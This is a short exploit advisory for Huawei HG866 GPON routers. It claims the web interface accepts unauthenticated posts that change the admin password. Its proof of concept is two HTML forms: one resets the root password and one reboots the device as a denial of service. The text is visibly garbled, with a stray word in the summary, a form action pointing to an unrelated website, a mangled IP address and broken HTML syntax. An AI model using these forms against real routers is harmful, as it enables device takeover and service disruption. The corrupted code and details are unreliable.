Title: Huawei HG866 Authentication Bypass
Author: hkm
Developer: http://www.huawei.com
Affected Versions: V1R2C01SPC202, R3.2.4.92sbn-R3.4.2.257sbn, 3FE53864AOCB16
Test Platform: HG866GTA_VER.C, 01, 02
Summary
Huawei HG866 GPON routers don't properly validate the session on every page. It is possible to change the web interface admin password by using Ming an unauthenticated post directly to the form.
Test proof
<! -- Changes root password --!>
<Form name = hg866bypass action = http: // www.2cto.com/html/password.html method = post>
<Input name = psw value = password> <input name = reenterpsw value = password>
<Input type = "submit" name = "save" value = "Apply"/>
</Form>
<! -- Reboots the device --!>
<Form name = hg866dos action = http: // 192.168.100.htm/html/admin_reboot.html "method =" post ">
<Input type = submit name = save id = save value = Reboot/>
</Form>
Hkm